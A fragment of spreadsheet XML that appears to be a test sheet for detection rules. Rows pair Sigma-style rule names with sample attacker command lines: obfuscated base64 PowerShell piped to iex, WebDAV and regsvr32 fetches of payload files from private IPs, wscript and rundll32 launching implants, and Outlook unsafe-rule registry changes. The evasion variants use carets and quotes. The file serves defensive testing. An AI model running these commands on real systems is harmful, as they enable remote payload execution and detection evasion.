      <c r="J897" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K897" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="898" ht="15.75" customHeight="1" s="42">
      <c r="A898" s="43" t="n"/>
      <c r="B898" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C898" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D898" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E898" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F898" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G898" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H898" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I898" s="43" t="n"/>
      <c r="J898" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K898" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="899" ht="15.75" customHeight="1" s="42">
      <c r="A899" s="43" t="n"/>
      <c r="B899" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C899" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D899" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E899" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F899" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G899" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H899" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I899" s="43" t="n"/>
      <c r="J899" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K899" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="900" ht="15.75" customHeight="1" s="42">
      <c r="A900" s="43" t="n"/>
      <c r="B900" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C900" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D900" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E900" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F900" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G900" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H900" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I900" s="43" t="n"/>
      <c r="J900" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K900" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="901" ht="15.75" customHeight="1" s="42">
      <c r="A901" s="43" t="n"/>
      <c r="B901" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C901" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D901" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E901" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F901" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G901" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H901" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I901" s="43" t="n"/>
      <c r="J901" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K901" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="902" ht="15.75" customHeight="1" s="42">
      <c r="A902" s="43" t="n"/>
      <c r="B902" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C902" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D902" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E902" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F902" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G902" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H902" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I902" s="43" t="n"/>
      <c r="J902" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K902" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="903" ht="15.75" customHeight="1" s="42">
      <c r="A903" s="44" t="n"/>
      <c r="B903" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C903" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D903" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E903" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F903" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G903" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H903" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I903" s="43" t="n"/>
      <c r="J903" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K903" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="904" ht="15.75" customHeight="1" s="42">
      <c r="A904" s="43" t="n"/>
      <c r="B904" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C904" s="44" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D904" s="44" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E904" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cmdkey.exe /del^ete:Microsoft_Windows_Shell_ZipFolder:filename=payload.z^ip"</t>
        </is>
      </c>
      <c r="F904" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G904" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H904" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I904" s="43" t="n"/>
      <c r="J904" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K904" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="905" ht="15.75" customHeight="1" s="42">
      <c r="A905" s="43" t="n"/>
      <c r="B905" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C905" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D905" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E905" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg add HKCU\Software\Microsoft\Office\16.0\Outlook\Security /v EnableUn^safeClientMailRules /t REG_DWORD /d 1 /f"</t>
        </is>
      </c>
      <c r="F905" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G905" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H905" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I905" s="43" t="n"/>
      <c r="J905" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K905" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="906" ht="15.75" customHeight="1" s="42">
      <c r="A906" s="43" t="n"/>
      <c r="B906" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C906" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D906" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E906" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v EnableUnsafeClientMailRules /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F906" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G906" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H906" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I906" s="43" t="n"/>
      <c r="J906" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K906" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="907" ht="15.75" customHeight="1" s="42">
      <c r="A907" s="43" t="n"/>
      <c r="B907" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C907" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D907" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E907" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F907" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G907" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H907" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I907" s="43" t="n"/>
      <c r="J907" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K907" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="908" ht="15.75" customHeight="1" s="42">
      <c r="A908" s="43" t="n"/>
      <c r="B908" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_pingcastle</t>
        </is>
      </c>
      <c r="C908" s="44" t="inlineStr">
        <is>
          <t>Renamed PingCastle Binary Execution</t>
        </is>
      </c>
      <c r="D908" s="44" t="inlineStr">
        <is>
          <t>2433a154-bb3d-42e4-86c3-a26bdac91c45</t>
        </is>
      </c>
      <c r="E908" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "audit_tool.exe --s^canner a^clcheck"</t>
        </is>
      </c>
      <c r="F908" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G908" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H908" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I908" s="43" t="n"/>
      <c r="J908" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K908" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="909" ht="15.75" customHeight="1" s="42">
      <c r="A909" s="43" t="n"/>
      <c r="B909" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webdav_lnk_execution</t>
        </is>
      </c>
      <c r="C909" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious WebDAV LNK Execution</t>
        </is>
      </c>
      <c r="D909" s="43" t="inlineStr">
        <is>
          <t>1412aa78-a24c-4abd-83df-767dfb2c5bbe</t>
        </is>
      </c>
      <c r="E909" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /v:on /c "set root=DavWWWRoot&amp;&amp; \\192.168.1.10@80\!root!\payload.bat"</t>
        </is>
      </c>
      <c r="F909" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G909" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H909" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I909" s="43" t="n"/>
      <c r="J909" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K909" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="910" ht="15.75" customHeight="1" s="42">
      <c r="A910" s="44" t="n"/>
      <c r="B910" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webdav_lnk_execution</t>
        </is>
      </c>
      <c r="C910" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious WebDAV LNK Execution</t>
        </is>
      </c>
      <c r="D910" s="44" t="inlineStr">
        <is>
          <t>1412aa78-a24c-4abd-83df-767dfb2c5bbe</t>
        </is>
      </c>
      <c r="E910" s="44" t="inlineStr">
        <is>
          <t>wmic.exe process call create "\\192.168.1.50\DavWWWRoot\share\payload.exe"</t>
        </is>
      </c>
      <c r="F910" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G910" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H910" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I910" s="43" t="n"/>
      <c r="J910" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K910" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="911" ht="15.75" customHeight="1" s="42">
      <c r="A911" s="44" t="n"/>
      <c r="B911" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C911" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D911" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E911" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F911" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G911" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H911" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I911" s="43" t="n"/>
      <c r="J911" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K911" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="912" ht="15.75" customHeight="1" s="42">
      <c r="A912" s="44" t="n"/>
      <c r="B912" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C912" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D912" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E912" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F912" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G912" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H912" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I912" s="43" t="n"/>
      <c r="J912" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K912" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="913" ht="15.75" customHeight="1" s="42">
      <c r="A913" s="44" t="n"/>
      <c r="B913" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C913" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D913" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E913" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //e:jSCRiPt -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F913" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G913" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H913" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I913" s="43" t="n"/>
      <c r="J913" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K913" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="914" ht="15.75" customHeight="1" s="42">
      <c r="A914" s="43" t="n"/>
      <c r="B914" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C914" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D914" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E914" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //nolOgO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F914" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G914" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H914" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I914" s="43" t="n"/>
      <c r="J914" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K914" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="915" ht="15.75" customHeight="1" s="42">
      <c r="A915" s="44" t="n"/>
      <c r="B915" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C915" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D915" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E915" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe -"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F915" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G915" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H915" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I915" s="43" t="n"/>
      <c r="J915" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K915" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="916" ht="15.75" customHeight="1" s="42">
      <c r="A916" s="43" t="n"/>
      <c r="B916" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C916" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D916" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E916" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //NoLOGO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F916" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G916" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H916" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I916" s="43" t="n"/>
      <c r="J916" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K916" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="917" ht="15.75" customHeight="1" s="42">
      <c r="A917" s="43" t="n"/>
      <c r="B917" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C917" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D917" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E917" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /C set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F917" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G917" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H917" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I917" s="43" t="n"/>
      <c r="J917" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K917" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="918" ht="15.75" customHeight="1" s="42">
      <c r="A918" s="43" t="n"/>
      <c r="B918" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C918" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D918" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E918" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //nOloGo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I918" s="43" t="n"/>
      <c r="J918" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K918" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="919" ht="15.75" customHeight="1" s="42">
      <c r="A919" s="43" t="n"/>
      <c r="B919" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C919" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D919" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E919" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I919" s="43" t="n"/>
      <c r="J919" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K919" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="920" ht="15.75" customHeight="1" s="42">
      <c r="A920" s="43" t="n"/>
      <c r="B920" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C920" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D920" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E920" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe -"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I920" s="43" t="n"/>
      <c r="J920" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K920" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="921" ht="15.75" customHeight="1" s="42">
      <c r="A921" s="43" t="n"/>
      <c r="B921" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C921" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D921" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E921" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /u"</t>
        </is>
      </c>
      <c r="F921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I921" s="44" t="n"/>
      <c r="J921" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K921" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="922" ht="15.75" customHeight="1" s="42">
      <c r="A922" s="43" t="n"/>
      <c r="B922" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C922" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D922" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E922" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /n -"u""</t>
        </is>
      </c>
      <c r="F922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I922" s="44" t="n"/>
      <c r="J922" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K922" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="923" ht="15.75" customHeight="1" s="42">
      <c r="A923" s="43" t="n"/>
      <c r="B923" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C923" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D923" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E923" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /"n" /u"</t>
        </is>
      </c>
      <c r="F923" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G923" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H923" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I923" s="44" t="n"/>
      <c r="J923" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K923" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="924" ht="15.75" customHeight="1" s="42">
      <c r="A924" s="43" t="n"/>
      <c r="B924" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C924" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D924" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E924" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /N /U"</t>
        </is>
      </c>
      <c r="F924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I924" s="44" t="n"/>
      <c r="J924" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K924" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="925" ht="15.75" customHeight="1" s="42">
      <c r="A925" s="43" t="n"/>
      <c r="B925" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C925" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D925" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E925" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" -"n" /U"</t>
        </is>
      </c>
      <c r="F925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I925" s="44" t="n"/>
      <c r="J925" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K925" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="926" ht="15.75" customHeight="1" s="42">
      <c r="A926" s="43" t="n"/>
